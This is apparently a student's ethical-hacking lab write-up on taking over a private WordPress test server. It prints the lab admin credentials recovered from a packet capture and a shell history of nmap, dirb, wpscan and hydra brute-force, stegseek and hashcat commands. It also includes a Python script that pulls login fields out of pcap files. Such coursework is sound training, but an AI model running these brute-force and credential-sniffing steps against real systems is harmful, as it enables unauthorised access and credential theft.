# Assignment 1 (Ethical Hacking)

## Muhammad Rafay | 18L-1016 | A

# Summary:

The `dirb` command was used to enumerate the endpoints of the target HTTP server, covering both directory-listable endpoints and endpoints that are not listable but are still publicly accessible. These endpoints were explored systematically until a significant one, `/ipdata`, was found. Accessing it exposed a packet capture named `analyze.cap`. The capture was then opened in Wireshark, a network protocol analyzer, to inspect its contents. It contained an HTTP POST request to the WordPress login page in which the administrator's username and password were sent in plaintext, since the site was served over unencrypted HTTP. Anyone able to capture traffic on the path between the browser and the server could have read the password the same way. This is exactly the kind of weakness an ethical hacking exercise is meant to surface so it can be fixed before a malicious actor exploits it.

Credentials obtained:

username: **webdeveloper**

password: **Te5eQg&4sBS!Yr$)wf%(DcAd**

## Commands executed (recovered from the zsh_history file):

```bash
wget http://192.168.0.101/wp-content/themes/twentyseventeen/screenshot.png
steghide --extract -sf screenshot.png
stegcracker
stegcracker screenshot.png /usr/share/wordlists/rockyou.txt.gz
stegcracker screenshot.png /usr/share/wordlists/rockyou.txt
cd /usr/share/wordlists
ls
unzip rockyou.txt.gz
gzip -d rockyou.txt.gz
sudo gzip -d rockyou.txt.gz
ls
cd -
stegcracker screenshot.png /usr/share/wordlists/rockyou.txt
stegseek
stegseek screenshot.png /usr/share/wordlists/rockyou.txt
pyrit
sudo apt install pyrit
sudo apt update && sudo apt install pyrit
ip a
netdiscover
sudo netdiscover
nmap 192.168.48.1 -p- -sV
nmap 192.168.48.2 -p- -sV
nmap 192.168.48.254 -p- -sV
netdiscover
sudo netdiscover
nmap 192.168.48.1 -p- -sV
nmap 192.168.0.101 -p- -sV
dirb http://192.168.0.101
ls
dirb http://192.168.0.101 /usr/share/wordlists/rockyou.txt
sudo apt install aircrack-ng
wget https://github.com/jspw/Crack-WIFI-WPA2/raw/master/cap2hccapx.c
ls *.cap
cd Downloads
ls *.cap
mv analyze.cap ..
cd ..
mv analyze.cap file.cap
./cap2hccapx file.cap file.hccapx
ls file file.cap
./cap2hccapx file.cap file.hccapx
wpscan
wpscan --url http://192.168.0.101/wp-login.php -P /usr/share/wordlists/rockyou.txt
echo webdeveloper >> users.txt && wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt --force
mkdir images
cd images
wget -r --no-parent http://192.168.0.101/wp-content/themes/twentyseventeen/assets/images/
ls
cd 192.168.0.101
ls
cd wp-content
ls
cd themes
ls
cd twentyseventeen
ls
cd assets
ls
cd images
ls
mv *.jpg ~/images
cd ~/images
ls
rm -rf 192.168.0.101
ls
clear
code ~/.zshrc
sudo apt install micro
micro ~/.zshrc
sudo apt install fzf
cd assets
stegseek --extract -sf coffee.jpg
stegseek coffee.jpg /usr/share/wordlists/rockyou.txt
stegseek espresso.jpg /usr/share/wordlists/rockyou.txt
stegseek header.jpg /usr/share/wordlists/rockyou.txt
stegseek sandwich.jpg /usr/share/wordlists/rockyou.txt
hydra -t 4 -l webdeveloper -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.101
hydra -t 4 -l webdeveloper -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.101 -R
hashcat
echo e37610d84c63d90bb61a8f78587cb4b4 >> hashes
hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt
dirb http://192.168.0.101 /usr/share/wordlists/rockyou.txt -w
dirb http://192.168.0.101 -w
dirb -w http://192.168.0.101
ls /usr/share/wordlists/dirb
dirb http://192.168.0.101 /usr/share/wordlists/dirb/indexes.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/big.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/mutations_common.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/catala.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/extensions_common.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/apache.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/cgis.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/axis.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/tomcat.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/euskera.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/others/best1050.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/others/names.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt
dirb http://192.168.0.101 /usr/share/wordlists/dirb/stress/uri_hex.txt
clear
ls
htop
exit
sudo apt install flameshot
sudo apt install marktext
clear
whoami
sudo apt install kali
sudo apt install kitty
kitty
clear
date
clear
htop
clear
dirb http://192.168.0.101 /usr/share/wordlists/dirb/common.txt
clear
dirb http://192.168.0.103
clear
ls file*
xdg-open file.cap
clear
exit
```

## Accessed Admin Interface:

![Screenshot 2024-03-29 180748](https://hackmd.io/_uploads/r17B0VV1A.png)

## Screenshots:

![Screenshot_2024-03-29_09_08_50](https://hackmd.io/_uploads/H1IaRVNyA.png)

Obtained `analyze.cap` from the **ipdata** endpoint.

![Screenshot_2024-03-29_09_09_01](https://hackmd.io/_uploads/HkIpAEVkR.png)

![Screenshot_2024-03-29_09_09_10](https://hackmd.io/_uploads/B1LTCENJC.png)

![Screenshot_2024-03-29_09_09_56](https://hackmd.io/_uploads/HkPaR4NJR.png)

Examined the POST request to see the credentials passed in plaintext, then tried them on the web application, where they worked.

![Screenshot_2024-03-29_09_09_57](https://hackmd.io/_uploads/HJvaANE10.png)
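The Wireshark step above (open `analyze.cap`, find the POST to `wp-login.php`, read the `log` and `pwd` form fields) can be scripted so the same check runs over any capture without a GUI. The following is an added example and not part of the original assignment or of any tool used in it. It parses the classic pcap format directly with the standard library, walks Ethernet/IPv4/TCP, and reports every HTTP POST whose body carries WordPress login fields. Because the verifier has no access to the real `analyze.cap`, the capture it reads is constructed inline by `build_sample_pcap()` from the credentials the writeup reports; the IPs, ports and sequence numbers in that sample are made up. It assumes a little-endian, microsecond-resolution pcap with Ethernet framing and a POST whose headers and body fit in one TCP segment; a login POST split across segments would need TCP reassembly (what Wireshark's "Follow TCP Stream" does), which this script does not do.

```python
"""Extract plaintext WordPress login credentials from a pcap (scripted version of the Wireshark step).

Added example, not the assignment's own code. The pcap is built inline so it runs offline;
call extract_post_credentials(open("analyze.cap", "rb").read()) to run it over a real capture.
"""
import struct
from urllib.parse import parse_qs, urlencode

PCAP_MAGIC_LE = 0xA1B2C3D4  # little-endian, microsecond timestamps
DLT_EN10MB = 1              # Ethernet link type


def iter_pcap_frames(data: bytes):
    """Yield each link-layer frame from classic pcap bytes (global header + packet records)."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC_LE:
        raise ValueError("only little-endian microsecond pcap is handled here (no pcapng)")
    linktype, = struct.unpack_from("<I", data, 20)
    if linktype != DLT_EN10MB:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes):
    """Return (src_ip, dst_ip, dst_port, payload) for an IPv4/TCP frame, or None otherwise."""
    if len(frame) < 14 + 20 or frame[12:14] != b"\x08\x00":  # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # IP protocol number 6 = TCP
        return None
    total_len = struct.unpack_from("!H", ip, 2)[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    data_off = (tcp[12] >> 4) * 4
    dport = struct.unpack_from("!H", tcp, 2)[0]
    return src, dst, dport, tcp[data_off:]


def extract_post_credentials(pcap_bytes: bytes):
    """Return one dict per HTTP POST whose form body carries WordPress 'log' and 'pwd' fields."""
    found = []
    for frame in iter_pcap_frames(pcap_bytes):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        if not payload.startswith(b"POST "):
            continue
        head, _, body = payload.partition(b"\r\n\r\n")
        request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
        fields = parse_qs(body.decode("latin-1"))
        # wp-login.php posts the username as 'log' and the password as 'pwd'
        if "log" in fields and "pwd" in fields:
            found.append({"client": src, "server": f"{dst}:{dport}", "request": request_line,
                          "username": fields["log"][0], "password": fields["pwd"][0]})
    return found


def build_sample_pcap(username: str, password: str) -> bytes:
    """Constructed sample: one Ethernet/IPv4/TCP frame carrying a wp-login.php POST (made-up addresses)."""
    body = urlencode({"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
    http = (b"POST /wp-login.php HTTP/1.1\r\nHost: 192.168.0.101\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    # TCP: sport, dport, seq, ack, data offset (5 words), flags PSH|ACK, window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", 51234, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + http
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([192, 168, 0, 50]), bytes([192, 168, 0, 101])) + tcp
    frame = b"\x00" * 12 + b"\x08\x00" + ip  # zeroed MACs, EtherType IPv4
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, DLT_EN10MB)
    record = struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return header + record


if __name__ == "__main__":
    sample = build_sample_pcap("webdeveloper", "Te5eQg&4sBS!Yr$)wf%(DcAd")
    for hit in extract_post_credentials(sample):
        print(f"{hit['client']} -> {hit['server']}  {hit['request']}  "
              f"user={hit['username']!r} pass={hit['password']!r}")
```

The same parsing shows why the finding matters: nothing in the capture needed decrypting, the password is simply a form field in an HTTP body, which is why the fix is serving the login page over HTTPS rather than anything WordPress-specific.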